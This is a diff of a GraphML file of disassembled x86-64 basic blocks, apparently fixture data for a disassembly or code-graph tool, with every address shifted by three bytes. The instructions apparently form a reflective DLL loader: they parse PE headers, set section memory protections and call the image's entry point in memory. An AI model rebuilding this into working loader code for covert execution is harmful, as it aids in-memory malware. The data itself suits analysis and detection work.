+        <edge source="block.0x1491:instruction.0x1495" target="block.0x1491:instruction.0x149c"/>
+        <edge source="block.0x1491:instruction.0x1498" target="block.0x1491:instruction.0x149c"/>
+        <edge source="block.0x1491:instruction.0x1498" target="block.0x1491:instruction.0x14a2"/>
+        <edge source="block.0x1491:instruction.0x1498" target="block.0x1491:instruction.0x14a7"/>
+        <edge source="block.0x1491:instruction.0x149c" target="block.0x1491:instruction.0x14a2"/>
       </graph>
     </node>
-    <node id="block.0x14aa">
-      <data key="address">0x14aa</data>
+    <node id="block.0x14ad">
+      <data key="address">0x14ad</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x14aa</data>
+        <data key="address">0x14ad</data>
         <data key="type">instructions</data>
-        <node id="block.0x14aa:instruction.0x14aa">
-          <data key="address">0x14aa</data>
+        <node id="block.0x14ad:instruction.0x14ad">
+          <data key="address">0x14ad</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4585ff</data>
           <data key="instruction.source">test r15d, r15d</data>
         </node>
-        <node id="block.0x14aa:instruction.0x14ad">
-          <data key="address">0x14ad</data>
+        <node id="block.0x14ad:instruction.0x14b0">
+          <data key="address">0x14b0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7478</data>
-          <data key="instruction.source">je 0x1527</data>
+          <data key="instruction.source">je 0x152a</data>
         </node>
-        <edge source="block.0x14aa:instruction.0x14aa" target="block.0x14aa:instruction.0x14ad"/>
+        <edge source="block.0x14ad:instruction.0x14ad" target="block.0x14ad:instruction.0x14b0"/>
       </graph>
     </node>
-    <node id="block.0x14af">
-      <data key="address">0x14af</data>
+    <node id="block.0x14b2">
+      <data key="address">0x14b2</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x14af</data>
+        <data key="address">0x14b2</data>
         <data key="type">instructions</data>
-        <node id="block.0x14af:instruction.0x14af">
-          <data key="address">0x14af</data>
+        <node id="block.0x14b2:instruction.0x14b2">
+          <data key="address">0x14b2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4508</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 8]</data>
         </node>
-        <node id="block.0x14af:instruction.0x14b3">
-          <data key="address">0x14b3</data>
+        <node id="block.0x14b2:instruction.0x14b6">
+          <data key="address">0x14b6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c0</data>
           <data key="instruction.source">test eax, eax</data>
         </node>
-        <node id="block.0x14af:instruction.0x14b5">
-          <data key="address">0x14b5</data>
+        <node id="block.0x14b2:instruction.0x14b8">
+          <data key="address">0x14b8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7467</data>
-          <data key="instruction.source">je 0x151e</data>
+          <data key="instruction.source">je 0x1521</data>
         </node>
-        <edge source="block.0x14af:instruction.0x14af" target="block.0x14af:instruction.0x14b3"/>
-        <edge source="block.0x14af:instruction.0x14b3" target="block.0x14af:instruction.0x14b5"/>
+        <edge source="block.0x14b2:instruction.0x14b2" target="block.0x14b2:instruction.0x14b6"/>
+        <edge source="block.0x14b2:instruction.0x14b6" target="block.0x14b2:instruction.0x14b8"/>
       </graph>
     </node>
-    <node id="block.0x14b7">
-      <data key="address">0x14b7</data>
+    <node id="block.0x14ba">
+      <data key="address">0x14ba</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x14b7</data>
+        <data key="address">0x14ba</data>
         <data key="type">instructions</data>
-        <node id="block.0x14b7:instruction.0x14b7">
-          <data key="address">0x14b7</data>
+        <node id="block.0x14ba:instruction.0x14ba">
+          <data key="address">0x14ba</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4524</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 0x24]</data>
         </node>
-        <node id="block.0x14b7:instruction.0x14bb">
-          <data key="address">0x14bb</data>
+        <node id="block.0x14ba:instruction.0x14be">
+          <data key="address">0x14be</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c1e81d</data>
           <data key="instruction.source">shr eax, 0x1d</data>
         </node>
-        <node id="block.0x14b7:instruction.0x14be">
-          <data key="address">0x14be</data>
+        <node id="block.0x14ba:instruction.0x14c1">
+          <data key="address">0x14c1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">83e007</data>
           <data key="instruction.source">and eax, 7</data>
         </node>
-        <node id="block.0x14b7:instruction.0x14c1">
-          <data key="address">0x14c1</data>
+        <node id="block.0x14ba:instruction.0x14c4">
+          <data key="address">0x14c4</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e914010000</data>
-          <data key="instruction.source">jmp 0x15da</data>
+          <data key="instruction.hex">e917010000</data>
+          <data key="instruction.source">jmp 0x15e0</data>
         </node>
-        <edge source="block.0x14b7:instruction.0x14b7" target="block.0x14b7:instruction.0x14bb"/>
-        <edge source="block.0x14b7:instruction.0x14bb" target="block.0x14b7:instruction.0x14be"/>
-        <edge source="block.0x14b7:instruction.0x14be" target="block.0x14b7:instruction.0x14c1"/>
+        <edge source="block.0x14ba:instruction.0x14ba" target="block.0x14ba:instruction.0x14be"/>
+        <edge source="block.0x14ba:instruction.0x14be" target="block.0x14ba:instruction.0x14c1"/>
+        <edge source="block.0x14ba:instruction.0x14c1" target="block.0x14ba:instruction.0x14c4"/>
       </graph>
     </node>
-    <node id="block.0x14c6">
-      <data key="address">0x14c6</data>
+    <node id="block.0x14c9">
+      <data key="address">0x14c9</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x14c6</data>
+        <data key="address">0x14c9</data>
         <data key="type">instructions</data>
-        <node id="block.0x14c6:instruction.0x14c6">
-          <data key="address">0x14c6</data>
+        <node id="block.0x14c9:instruction.0x14c9">
+          <data key="address">0x14c9</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5b</data>
           <data key="instruction.source">pop rbx</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14c7">
-          <data key="address">0x14c7</data>
+        <node id="block.0x14c9:instruction.0x14ca">
+          <data key="address">0x14ca</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0fb61c03</data>
           <data key="instruction.source">movzx ebx, byte ptr [rbx + rax]</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14cb">
-          <data key="address">0x14cb</data>
+        <node id="block.0x14c9:instruction.0x14ce">
+          <data key="address">0x14ce</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883ec48</data>
           <data key="instruction.source">sub rsp, 0x48</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14cf">
-          <data key="address">0x14cf</data>
+        <node id="block.0x14c9:instruction.0x14d2">
+          <data key="address">0x14d2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b450c</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 0xc]</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14d3">
-          <data key="address">0x14d3</data>
+        <node id="block.0x14c9:instruction.0x14d6">
+          <data key="address">0x14d6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4dd0</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14d7">
-          <data key="address">0x14d7</data>
+        <node id="block.0x14c9:instruction.0x14da">
+          <data key="address">0x14da</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801c1</data>
           <data key="instruction.source">add rcx, rax</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14da">
-          <data key="address">0x14da</data>
+        <node id="block.0x14c9:instruction.0x14dd">
+          <data key="address">0x14dd</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48894c2430</data>
           <data key="instruction.source">mov qword ptr [rsp + 0x30], rcx</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14df">
-          <data key="address">0x14df</data>
+        <node id="block.0x14c9:instruction.0x14e2">
+          <data key="address">0x14e2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4508</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 8]</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14e3">
-          <data key="address">0x14e3</data>
+        <node id="block.0x14c9:instruction.0x14e6">
+          <data key="address">0x14e6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4889442438</data>
           <data key="instruction.source">mov qword ptr [rsp + 0x38], rax</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14e8">
-          <data key="address">0x14e8</data>
+        <node id="block.0x14c9:instruction.0x14eb">
+          <data key="address">0x14eb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c744244000000000</data>
           <data key="instruction.source">mov dword ptr [rsp + 0x40], 0</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14f0">
-          <data key="address">0x14f0</data>
+        <node id="block.0x14c9:instruction.0x14f3">
+          <data key="address">0x14f3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48c7c1ffffffff</data>
           <data key="instruction.source">mov rcx, 0xffffffffffffffff</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14f7">
-          <data key="address">0x14f7</data>
+        <node id="block.0x14c9:instruction.0x14fa">
+          <data key="address">0x14fa</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488d542430</data>
           <data key="instruction.source">lea rdx, [rsp + 0x30]</data>
         </node>
-        <node id="block.0x14c6:instruction.0x14fc">
-          <data key="address">0x14fc</data>
+        <node id="block.0x14c9:instruction.0x14ff">
+          <data key="address">0x14ff</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8d442438</data>
           <data key="instruction.source">lea r8, [rsp + 0x38]</data>
         </node>
-        <node id="block.0x14c6:instruction.0x1501">
-          <data key="address">0x1501</data>
+        <node id="block.0x14c9:instruction.0x1504">
+          <data key="address">0x1504</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4189d9</data>
           <data key="instruction.source">mov r9d, ebx</data>
         </node>
-        <node id="block.0x14c6:instruction.0x1504">
-          <data key="address">0x1504</data>
+        <node id="block.0x14c9:instruction.0x1507">
+          <data key="address">0x1507</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488d442440</data>
           <data key="instruction.source">lea rax, [rsp + 0x40]</data>
         </node>
-        <node id="block.0x14c6:instruction.0x1509">
-          <data key="address">0x1509</data>
+        <node id="block.0x14c9:instruction.0x150c">
+          <data key="address">0x150c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4889442420</data>
           <data key="instruction.source">mov qword ptr [rsp + 0x20], rax</data>
         </node>
-        <node id="block.0x14c6:instruction.0x150e">
-          <data key="address">0x150e</data>
+        <node id="block.0x14c9:instruction.0x1511">
+          <data key="address">0x1511</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b9568ffffff</data>
           <data key="instruction.source">mov r10, qword ptr [rbp - 0x98]</data>
         </node>
-        <node id="block.0x14c6:instruction.0x1515">
-          <data key="address">0x1515</data>
+        <node id="block.0x14c9:instruction.0x1518">
+          <data key="address">0x1518</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e866000000</data>
-          <data key="instruction.source">call 0x1580</data>
+          <data key="instruction.source">call 0x1583</data>
         </node>
-        <edge source="block.0x14c6:instruction.0x14c6" target="block.0x14c6:instruction.0x14c7"/>
-        <edge source="block.0x14c6:instruction.0x14c6" target="block.0x14c6:instruction.0x14cb"/>
-        <edge source="block.0x14c6:instruction.0x14c7" target="block.0x14c6:instruction.0x14cf"/>
-        <edge source="block.0x14c6:instruction.0x14c7" target="block.0x14c6:instruction.0x14da"/>
-        <edge source="block.0x14c6:instruction.0x14c7" target="block.0x14c6:instruction.0x1501"/>
-        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14d7"/>
-        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14da"/>
-        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14e3"/>
-        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14e8"/>
-        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14f7"/>
-        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x14fc"/>
-        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x1504"/>
-        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x1509"/>
-        <edge source="block.0x14c6:instruction.0x14cb" target="block.0x14c6:instruction.0x1515"/>
-        <edge source="block.0x14c6:instruction.0x14cf" target="block.0x14c6:instruction.0x14d7"/>
-        <edge source="block.0x14c6:instruction.0x14cf" target="block.0x14c6:instruction.0x14da"/>
-        <edge source="block.0x14c6:instruction.0x14cf" target="block.0x14c6:instruction.0x14df"/>
-        <edge source="block.0x14c6:instruction.0x14d3" target="block.0x14c6:instruction.0x14d7"/>
-        <edge source="block.0x14c6:instruction.0x14d3" target="block.0x14c6:instruction.0x14da"/>
-        <edge source="block.0x14c6:instruction.0x14d7" target="block.0x14c6:instruction.0x14da"/>
-        <edge source="block.0x14c6:instruction.0x14d7" target="block.0x14c6:instruction.0x14df"/>
-        <edge source="block.0x14c6:instruction.0x14d7" target="block.0x14c6:instruction.0x14f0"/>
-        <edge source="block.0x14c6:instruction.0x14da" target="block.0x14c6:instruction.0x14df"/>
-        <edge source="block.0x14c6:instruction.0x14da" target="block.0x14c6:instruction.0x14f0"/>
-        <edge source="block.0x14c6:instruction.0x14da" target="block.0x14c6:instruction.0x1515"/>
-        <edge source="block.0x14c6:instruction.0x14df" target="block.0x14c6:instruction.0x14e3"/>
-        <edge source="block.0x14c6:instruction.0x14df" target="block.0x14c6:instruction.0x1504"/>
-        <edge source="block.0x14c6:instruction.0x14e3" target="block.0x14c6:instruction.0x1504"/>
-        <edge source="block.0x14c6:instruction.0x14e3" target="block.0x14c6:instruction.0x1515"/>
-        <edge source="block.0x14c6:instruction.0x14e8" target="block.0x14c6:instruction.0x1515"/>
-        <edge source="block.0x14c6:instruction.0x14f0" target="block.0x14c6:instruction.0x1515"/>
-        <edge source="block.0x14c6:instruction.0x14f7" target="block.0x14c6:instruction.0x1515"/>
-        <edge source="block.0x14c6:instruction.0x14fc" target="block.0x14c6:instruction.0x1515"/>
-        <edge source="block.0x14c6:instruction.0x1501" target="block.0x14c6:instruction.0x1515"/>
-        <edge source="block.0x14c6:instruction.0x1504" target="block.0x14c6:instruction.0x1509"/>
-        <edge source="block.0x14c6:instruction.0x1504" target="block.0x14c6:instruction.0x1515"/>
-        <edge source="block.0x14c6:instruction.0x1509" target="block.0x14c6:instruction.0x150e"/>
-        <edge source="block.0x14c6:instruction.0x1509" target="block.0x14c6:instruction.0x1515"/>
-        <edge source="block.0x14c6:instruction.0x150e" target="block.0x14c6:instruction.0x1515"/>
+        <edge source="block.0x14c9:instruction.0x14c9" target="block.0x14c9:instruction.0x14ca"/>
+        <edge source="block.0x14c9:instruction.0x14c9" target="block.0x14c9:instruction.0x14ce"/>
+        <edge source="block.0x14c9:instruction.0x14ca" target="block.0x14c9:instruction.0x14d2"/>
+        <edge source="block.0x14c9:instruction.0x14ca" target="block.0x14c9:instruction.0x14dd"/>
+        <edge source="block.0x14c9:instruction.0x14ca" target="block.0x14c9:instruction.0x1504"/>
+        <edge source="block.0x14c9:instruction.0x14ce" target="block.0x14c9:instruction.0x14da"/>
+        <edge source="block.0x14c9:instruction.0x14ce" target="block.0x14c9:instruction.0x14dd"/>
+        <edge source="block.0x14c9:instruction.0x14ce" target="block.0x14c9:instruction.0x14e6"/>
+        <edge source="block.0x14c9:instruction.0x14ce" target="block.0x14c9:instruction.0x14eb"/>
+        <edge source="block.0x14c9:instruction.0x14ce" target="block.0x14c9:instruction.0x14fa"/>
+        <edge source="block.0x14c9:instruction.0x14ce" target="block.0x14c9:instruction.0x14ff"/>
+        <edge source="block.0x14c9:instruction.0x14ce" target="block.0x14c9:instruction.0x1507"/>
+        <edge source="block.0x14c9:instruction.0x14ce" target="block.0x14c9:instruction.0x150c"/>
+        <edge source="block.0x14c9:instruction.0x14ce" target="block.0x14c9:instruction.0x1518"/>
+        <edge source="block.0x14c9:instruction.0x14d2" target="block.0x14c9:instruction.0x14da"/>
+        <edge source="block.0x14c9:instruction.0x14d2" target="block.0x14c9:instruction.0x14dd"/>
+        <edge source="block.0x14c9:instruction.0x14d2" target="block.0x14c9:instruction.0x14e2"/>
+        <edge source="block.0x14c9:instruction.0x14d6" target="block.0x14c9:instruction.0x14da"/>
+        <edge source="block.0x14c9:instruction.0x14d6" target="block.0x14c9:instruction.0x14dd"/>
+        <edge source="block.0x14c9:instruction.0x14da" target="block.0x14c9:instruction.0x14dd"/>
+        <edge source="block.0x14c9:instruction.0x14da" target="block.0x14c9:instruction.0x14e2"/>
+        <edge source="block.0x14c9:instruction.0x14da" target="block.0x14c9:instruction.0x14f3"/>
+        <edge source="block.0x14c9:instruction.0x14dd" target="block.0x14c9:instruction.0x14e2"/>
+        <edge source="block.0x14c9:instruction.0x14dd" target="block.0x14c9:instruction.0x14f3"/>
+        <edge source="block.0x14c9:instruction.0x14dd" target="block.0x14c9:instruction.0x1518"/>
+        <edge source="block.0x14c9:instruction.0x14e2" target="block.0x14c9:instruction.0x14e6"/>
+        <edge source="block.0x14c9:instruction.0x14e2" target="block.0x14c9:instruction.0x1507"/>
+        <edge source="block.0x14c9:instruction.0x14e6" target="block.0x14c9:instruction.0x1507"/>
+        <edge source="block.0x14c9:instruction.0x14e6" target="block.0x14c9:instruction.0x1518"/>
+        <edge source="block.0x14c9:instruction.0x14eb" target="block.0x14c9:instruction.0x1518"/>
+        <edge source="block.0x14c9:instruction.0x14f3" target="block.0x14c9:instruction.0x1518"/>
+        <edge source="block.0x14c9:instruction.0x14fa" target="block.0x14c9:instruction.0x1518"/>
+        <edge source="block.0x14c9:instruction.0x14ff" target="block.0x14c9:instruction.0x1518"/>
+        <edge source="block.0x14c9:instruction.0x1504" target="block.0x14c9:instruction.0x1518"/>
+        <edge source="block.0x14c9:instruction.0x1507" target="block.0x14c9:instruction.0x150c"/>
+        <edge source="block.0x14c9:instruction.0x1507" target="block.0x14c9:instruction.0x1518"/>
+        <edge source="block.0x14c9:instruction.0x150c" target="block.0x14c9:instruction.0x1511"/>
+        <edge source="block.0x14c9:instruction.0x150c" target="block.0x14c9:instruction.0x1518"/>
+        <edge source="block.0x14c9:instruction.0x1511" target="block.0x14c9:instruction.0x1518"/>
       </graph>
     </node>
-    <node id="block.0x151a">
-      <data key="address">0x151a</data>
+    <node id="block.0x151d">
+      <data key="address">0x151d</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x151a</data>
+        <data key="address">0x151d</data>
         <data key="type">instructions</data>
-        <node id="block.0x151a:instruction.0x151a">
-          <data key="address">0x151a</data>
+        <node id="block.0x151d:instruction.0x151d">
+          <data key="address">0x151d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c448</data>
           <data key="instruction.source">add rsp, 0x48</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x151e">
-      <data key="address">0x151e</data>
+    <node id="block.0x1521">
+      <data key="address">0x1521</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x151e</data>
+        <data key="address">0x1521</data>
         <data key="type">instructions</data>
-        <node id="block.0x151e:instruction.0x151e">
-          <data key="address">0x151e</data>
+        <node id="block.0x1521:instruction.0x1521">
+          <data key="address">0x1521</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4983c528</data>
           <data key="instruction.source">add r13, 0x28</data>
         </node>
-        <node id="block.0x151e:instruction.0x1522">
-          <data key="address">0x1522</data>
+        <node id="block.0x1521:instruction.0x1525">
+          <data key="address">0x1525</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41ffcf</data>
           <data key="instruction.source">dec r15d</data>
         </node>
-        <node id="block.0x151e:instruction.0x1525">
-          <data key="address">0x1525</data>
+        <node id="block.0x1521:instruction.0x1528">
+          <data key="address">0x1528</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb83</data>
-          <data key="instruction.source">jmp 0x14aa</data>
+          <data key="instruction.source">jmp 0x14ad</data>
         </node>
-        <edge source="block.0x151e:instruction.0x151e" target="block.0x151e:instruction.0x1522"/>
-        <edge source="block.0x151e:instruction.0x1522" target="block.0x151e:instruction.0x1525"/>
+        <edge source="block.0x1521:instruction.0x1521" target="block.0x1521:instruction.0x1525"/>
+        <edge source="block.0x1521:instruction.0x1525" target="block.0x1521:instruction.0x1528"/>
       </graph>
     </node>
-    <node id="block.0x1527">
-      <data key="address">0x1527</data>
+    <node id="block.0x152a">
+      <data key="address">0x152a</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1527</data>
+        <data key="address">0x152a</data>
         <data key="type">instructions</data>
-        <node id="block.0x1527:instruction.0x1527">
-          <data key="address">0x1527</data>
+        <node id="block.0x152a:instruction.0x152a">
+          <data key="address">0x152a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4dd0</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1527:instruction.0x152b">
-          <data key="address">0x152b</data>
+        <node id="block.0x152a:instruction.0x152e">
+          <data key="address">0x152e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b413c</data>
           <data key="instruction.source">mov eax, dword ptr [rcx + 0x3c]</data>
         </node>
-        <node id="block.0x1527:instruction.0x152e">
-          <data key="address">0x152e</data>
+        <node id="block.0x152a:instruction.0x1531">
+          <data key="address">0x1531</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8d2401</data>
           <data key="instruction.source">lea r12, [rcx + rax]</data>
         </node>
-        <node id="block.0x1527:instruction.0x1532">
-          <data key="address">0x1532</data>
+        <node id="block.0x152a:instruction.0x1535">
+          <data key="address">0x1535</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b442428</data>
           <data key="instruction.source">mov eax, dword ptr [r12 + 0x28]</data>
         </node>
-        <node id="block.0x1527:instruction.0x1537">
-          <data key="address">0x1537</data>
+        <node id="block.0x152a:instruction.0x153a">
+          <data key="address">0x153a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b6dd0</data>
           <data key="instruction.source">mov r13, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1527:instruction.0x153b">
-          <data key="address">0x153b</data>
+        <node id="block.0x152a:instruction.0x153e">
+          <data key="address">0x153e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4901c5</data>
           <data key="instruction.source">add r13, rax</data>
         </node>
-        <node id="block.0x1527:instruction.0x153e">
-          <data key="address">0x153e</data>
+        <node id="block.0x152a:instruction.0x1541">
+          <data key="address">0x1541</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883ec28</data>
           <data key="instruction.source">sub rsp, 0x28</data>
         </node>
-        <node id="block.0x1527:instruction.0x1542">
-          <data key="address">0x1542</data>
+        <node id="block.0x152a:instruction.0x1545">
+          <data key="address">0x1545</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48c7c1ffffffff</data>
           <data key="instruction.source">mov rcx, 0xffffffffffffffff</data>
         </node>
-        <node id="block.0x1527:instruction.0x1549">
-          <data key="address">0x1549</data>
+        <node id="block.0x152a:instruction.0x154c">
+          <data key="address">0x154c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4831d2</data>
           <data key="instruction.source">xor rdx, rdx</data>
         </node>
-        <node id="block.0x1527:instruction.0x154c">
-          <data key="address">0x154c</data>
+        <node id="block.0x152a:instruction.0x154f">
+          <data key="address">0x154f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4531c0</data>
           <data key="instruction.source">xor r8d, r8d</data>
         </node>
-        <node id="block.0x1527:instruction.0x154f">
-          <data key="address">0x154f</data>
+        <node id="block.0x152a:instruction.0x1552">
+          <data key="address">0x1552</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ff55e0</data>
           <data key="instruction.source">call qword ptr [rbp - 0x20]</data>
         </node>
-        <edge source="block.0x1527:instruction.0x1527" target="block.0x1527:instruction.0x152b"/>
-        <edge source="block.0x1527:instruction.0x1527" target="block.0x1527:instruction.0x152e"/>
-        <edge source="block.0x1527:instruction.0x1527" target="block.0x1527:instruction.0x1542"/>
-        <edge source="block.0x1527:instruction.0x1527" target="block.0x1527:instruction.0x154f"/>
-        <edge source="block.0x1527:instruction.0x152b" target="block.0x1527:instruction.0x152e"/>
-        <edge source="block.0x1527:instruction.0x152b" target="block.0x1527:instruction.0x1532"/>
-        <edge source="block.0x1527:instruction.0x152b" target="block.0x1527:instruction.0x1542"/>
-        <edge source="block.0x1527:instruction.0x152b" target="block.0x1527:instruction.0x154f"/>
-        <edge source="block.0x1527:instruction.0x152e" target="block.0x1527:instruction.0x1532"/>
-        <edge source="block.0x1527:instruction.0x152e" target="block.0x1527:instruction.0x1542"/>
-        <edge source="block.0x1527:instruction.0x1532" target="block.0x1527:instruction.0x153b"/>
-        <edge source="block.0x1527:instruction.0x1532" target="block.0x1527:instruction.0x154f"/>
-        <edge source="block.0x1527:instruction.0x1537" target="block.0x1527:instruction.0x153b"/>
-        <edge source="block.0x1527:instruction.0x1537" target="block.0x1527:instruction.0x154f"/>
-        <edge source="block.0x1527:instruction.0x153b" target="block.0x1527:instruction.0x153e"/>
-        <edge source="block.0x1527:instruction.0x153e" target="block.0x1527:instruction.0x1549"/>
-        <edge source="block.0x1527:instruction.0x153e" target="block.0x1527:instruction.0x154f"/>
-        <edge source="block.0x1527:instruction.0x1542" target="block.0x1527:instruction.0x154f"/>
-        <edge source="block.0x1527:instruction.0x1549" target="block.0x1527:instruction.0x154c"/>
-        <edge source="block.0x1527:instruction.0x154c" target="block.0x1527:instruction.0x154f"/>
+        <edge source="block.0x152a:instruction.0x152a" target="block.0x152a:instruction.0x152e"/>
+        <edge source="block.0x152a:instruction.0x152a" target="block.0x152a:instruction.0x1531"/>
+        <edge source="block.0x152a:instruction.0x152a" target="block.0x152a:instruction.0x1545"/>
+        <edge source="block.0x152a:instruction.0x152a" target="block.0x152a:instruction.0x1552"/>
+        <edge source="block.0x152a:instruction.0x152e" target="block.0x152a:instruction.0x1531"/>
+        <edge source="block.0x152a:instruction.0x152e" target="block.0x152a:instruction.0x1535"/>
+        <edge source="block.0x152a:instruction.0x152e" target="block.0x152a:instruction.0x1545"/>
+        <edge source="block.0x152a:instruction.0x152e" target="block.0x152a:instruction.0x1552"/>
+        <edge source="block.0x152a:instruction.0x1531" target="block.0x152a:instruction.0x1535"/>
+        <edge source="block.0x152a:instruction.0x1531" target="block.0x152a:instruction.0x1545"/>
+        <edge source="block.0x152a:instruction.0x1535" target="block.0x152a:instruction.0x153e"/>
+        <edge source="block.0x152a:instruction.0x1535" target="block.0x152a:instruction.0x1552"/>
+        <edge source="block.0x152a:instruction.0x153a" target="block.0x152a:instruction.0x153e"/>
+        <edge source="block.0x152a:instruction.0x153a" target="block.0x152a:instruction.0x1552"/>
+        <edge source="block.0x152a:instruction.0x153e" target="block.0x152a:instruction.0x1541"/>
+        <edge source="block.0x152a:instruction.0x1541" target="block.0x152a:instruction.0x154c"/>
+        <edge source="block.0x152a:instruction.0x1541" target="block.0x152a:instruction.0x1552"/>
+        <edge source="block.0x152a:instruction.0x1545" target="block.0x152a:instruction.0x1552"/>
+        <edge source="block.0x152a:instruction.0x154c" target="block.0x152a:instruction.0x154f"/>
+        <edge source="block.0x152a:instruction.0x154f" target="block.0x152a:instruction.0x1552"/>
       </graph>
     </node>
-    <node id="block.0x1552">
-      <data key="address">0x1552</data>
+    <node id="block.0x1555">
+      <data key="address">0x1555</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1552</data>
+        <data key="address">0x1555</data>
         <data key="type">instructions</data>
-        <node id="block.0x1552:instruction.0x1552">
-          <data key="address">0x1552</data>
+        <node id="block.0x1555:instruction.0x1555">
+          <data key="address">0x1555</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c428</data>
           <data key="instruction.source">add rsp, 0x28</data>
         </node>
-        <node id="block.0x1552:instruction.0x1556">
-          <data key="address">0x1556</data>
+        <node id="block.0x1555:instruction.0x1559">
+          <data key="address">0x1559</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883ec28</data>
           <data key="instruction.source">sub rsp, 0x28</data>
         </node>
-        <node id="block.0x1552:instruction.0x155a">
-          <data key="address">0x155a</data>
+        <node id="block.0x1555:instruction.0x155d">
+          <data key="address">0x155d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4dd0</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1552:instruction.0x155e">
-          <data key="address">0x155e</data>
+        <node id="block.0x1555:instruction.0x1561">
+          <data key="address">0x1561</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ba01000000</data>
           <data key="instruction.source">mov edx, 1</data>
         </node>
-        <node id="block.0x1552:instruction.0x1563">
-          <data key="address">0x1563</data>
+        <node id="block.0x1555:instruction.0x1566">
+          <data key="address">0x1566</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4531c0</data>
           <data key="instruction.source">xor r8d, r8d</data>
         </node>
-        <node id="block.0x1552:instruction.0x1566">
-          <data key="address">0x1566</data>
+        <node id="block.0x1555:instruction.0x1569">
+          <data key="address">0x1569</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41ffd5</data>
           <data key="instruction.source">call r13</data>
         </node>
-        <edge source="block.0x1552:instruction.0x1552" target="block.0x1552:instruction.0x1556"/>
-        <edge source="block.0x1552:instruction.0x1556" target="block.0x1552:instruction.0x1563"/>
-        <edge source="block.0x1552:instruction.0x1556" target="block.0x1552:instruction.0x1566"/>
